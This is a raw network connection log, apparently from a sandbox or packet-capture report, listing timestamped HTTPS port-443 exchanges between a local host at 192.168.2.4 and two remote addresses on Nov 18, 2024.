                                          Nov 18, 2024 23:44:51.931838036 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.931869984 CET57334443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.931885958 CET4435733413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.935089111 CET57339443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.935175896 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.935269117 CET57339443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.935501099 CET57339443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.935534000 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.967761993 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.967917919 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.967967033 CET57335443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.968101025 CET57335443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.968117952 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.968132973 CET57335443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.968138933 CET4435733513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.971118927 CET57340443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.971189022 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.971256018 CET57340443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.971483946 CET57340443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.971506119 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.983026981 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.983155012 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.983227015 CET57337443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.983370066 CET57337443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.983402014 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.983429909 CET57337443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.983444929 CET4435733713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.985898972 CET57341443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.985997915 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.986069918 CET57341443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.986260891 CET57341443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.986295938 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.995204926 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.999269009 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.999358892 CET57336443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.999414921 CET57336443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.999414921 CET57336443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:51.999444962 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:51.999470949 CET4435733613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.001194954 CET57342443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.001252890 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.001358032 CET57342443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.001465082 CET57342443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.001493931 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.281562090 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.282126904 CET57338443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.282190084 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.282596111 CET57338443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.282608986 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.411214113 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.411451101 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.411556005 CET57338443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.411613941 CET57338443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.411613941 CET57338443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.411650896 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.411688089 CET4435733813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.414527893 CET57343443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.414618015 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.414949894 CET57343443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.414949894 CET57343443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.415030003 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.686362982 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.687462091 CET57339443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.687490940 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.687932968 CET57339443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.687941074 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.705549955 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.706129074 CET57340443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.706171989 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.706722975 CET57340443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.706728935 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.732795954 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.733414888 CET57341443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.733474970 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.733927965 CET57341443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.733946085 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.735378027 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.735677958 CET57342443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.735692978 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.736135006 CET57342443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.736140966 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.821959019 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.822001934 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.822243929 CET57339443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.822279930 CET57339443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.822279930 CET57339443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.822300911 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.822312117 CET4435733913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.825212002 CET57344443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.825248003 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.825339079 CET57344443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.825479984 CET57344443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.825485945 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.833992004 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.834132910 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.834188938 CET57340443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.834224939 CET57340443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.834224939 CET57340443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.834244967 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.834256887 CET4435734013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.836658001 CET57345443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.836694002 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.836771011 CET57345443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.836910963 CET57345443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.836925030 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.866017103 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.866034031 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.866184950 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.866192102 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.866300106 CET57342443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.866322994 CET57341443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.866363049 CET57342443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.866363049 CET57342443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.866370916 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.866380930 CET4435734213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.866699934 CET57341443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.866738081 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.866764069 CET57341443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.866796970 CET4435734113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.868753910 CET57346443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.868788958 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.868885040 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.868923903 CET4435734713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.868927002 CET57346443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.868993998 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.869049072 CET57346443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.869062901 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:52.869183064 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:52.869213104 CET4435734713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.574206114 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.575124979 CET57344443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.575148106 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.575702906 CET57344443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.575709105 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.578037977 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.578310013 CET57345443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.578335047 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.578788996 CET57345443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.578793049 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.600765944 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.601108074 CET57346443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.601116896 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.601627111 CET57346443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.601632118 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.628849030 CET4435734713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.630625010 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.630635977 CET4435734713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.631068945 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.631073952 CET4435734713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.707139015 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.707668066 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.707729101 CET57344443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.707844973 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.708084106 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.708127975 CET57345443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.729078054 CET57344443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.729104996 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.729120016 CET57344443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.729127884 CET4435734413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.730350018 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.730432987 CET57345443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.730463982 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.730484009 CET57345443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.730489969 CET4435734513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.730715036 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.730765104 CET57346443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.730889082 CET57346443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.730897903 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.730907917 CET57346443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.730912924 CET4435734613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.733509064 CET57348443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.733544111 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.733603954 CET57348443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.733675003 CET57349443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.733767986 CET57348443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.733777046 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.733788013 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.733850956 CET57349443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.733925104 CET57349443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.733957052 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.734307051 CET57350443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.734319925 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.734375954 CET57350443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.734545946 CET57350443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.734558105 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.784874916 CET4435734713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.787873983 CET4435734713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.788031101 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.788031101 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.788031101 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.789952040 CET57351443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.790035963 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:53.790170908 CET57351443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.790263891 CET57351443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:53.790283918 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.097388029 CET57347443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.097419024 CET4435734713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.191770077 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.192379951 CET57343443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.192460060 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.192851067 CET57343443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.192869902 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.336911917 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.337655067 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.337724924 CET57343443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.337795973 CET57343443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.337795973 CET57343443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.337840080 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.337862968 CET4435734313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.340737104 CET57352443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.340827942 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.340917110 CET57352443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.341038942 CET57352443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.341068029 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.466423035 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.466960907 CET57350443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.466978073 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.467550039 CET57350443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.467556953 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.475545883 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.475866079 CET57349443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.475928068 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.476264954 CET57349443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.476279020 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.485111952 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.485497952 CET57348443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.485506058 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.485838890 CET57348443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.485843897 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.520684004 CET57353443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:44:54.520731926 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:44:54.520797014 CET57353443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:44:54.521132946 CET57353443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:44:54.521150112 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:44:54.526199102 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.526560068 CET57351443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.526577950 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.527056932 CET57351443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.527067900 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.596312046 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.596453905 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.596507072 CET57350443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.596616983 CET57350443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.596637011 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.596649885 CET57350443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.596656084 CET4435735013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.599997044 CET57354443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.600084066 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.600151062 CET57354443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.600295067 CET57354443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.600322008 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.609879017 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.609950066 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.609999895 CET57349443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.610085011 CET57349443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.610085964 CET57349443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.610106945 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.610120058 CET4435734913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.612457037 CET57355443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.612555981 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.612627983 CET57355443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.612755060 CET57355443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.612791061 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.618272066 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.618486881 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.618536949 CET57348443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.618571043 CET57348443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.618580103 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.618592024 CET57348443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.618598938 CET4435734813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.620881081 CET57356443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.620914936 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.620975018 CET57356443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.621092081 CET57356443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.621110916 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.656258106 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.656416893 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.656475067 CET57351443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.656529903 CET57351443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.656529903 CET57351443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.656548023 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.656569958 CET4435735113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.658827066 CET57357443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.658912897 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:54.658986092 CET57357443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.659123898 CET57357443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:54.659158945 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.071839094 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.072314978 CET57352443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.072351933 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.072762012 CET57352443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.072768927 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.201792002 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.201972008 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.202121973 CET57352443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.202166080 CET57352443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.202166080 CET57352443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.202188969 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.202203989 CET4435735213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.204986095 CET57358443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.205081940 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.205228090 CET57358443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.205353975 CET57358443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.205377102 CET4435735813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.374571085 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:44:55.374850988 CET57353443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:44:55.374886990 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:44:55.375072956 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.375508070 CET57355443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.375552893 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.375952005 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:44:55.376029968 CET57355443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.376043081 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.376336098 CET57353443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:44:55.376431942 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:44:55.391746044 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.392095089 CET57356443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.392133951 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.392460108 CET57356443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.392472029 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.413975000 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.414345980 CET57357443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.414428949 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.414712906 CET57357443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.414727926 CET4435735713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.422944069 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.423202991 CET57354443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.423233032 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.423501968 CET57354443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.423507929 CET4435735413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.425373077 CET57353443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:44:55.504852057 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.505295992 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.505387068 CET57355443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.505490065 CET57355443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.505506992 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.505533934 CET57355443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.505541086 CET4435735513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.508223057 CET57359443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.508313894 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.508384943 CET57359443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.508507967 CET57359443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.508524895 CET4435735913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.535093069 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.535161018 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.535403967 CET57356443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.535485029 CET57356443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.535485029 CET57356443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.535521984 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.535545111 CET4435735613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:55.537245035 CET57360443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:55.537271023 CET4435736013.107.246.45192.168.2.4
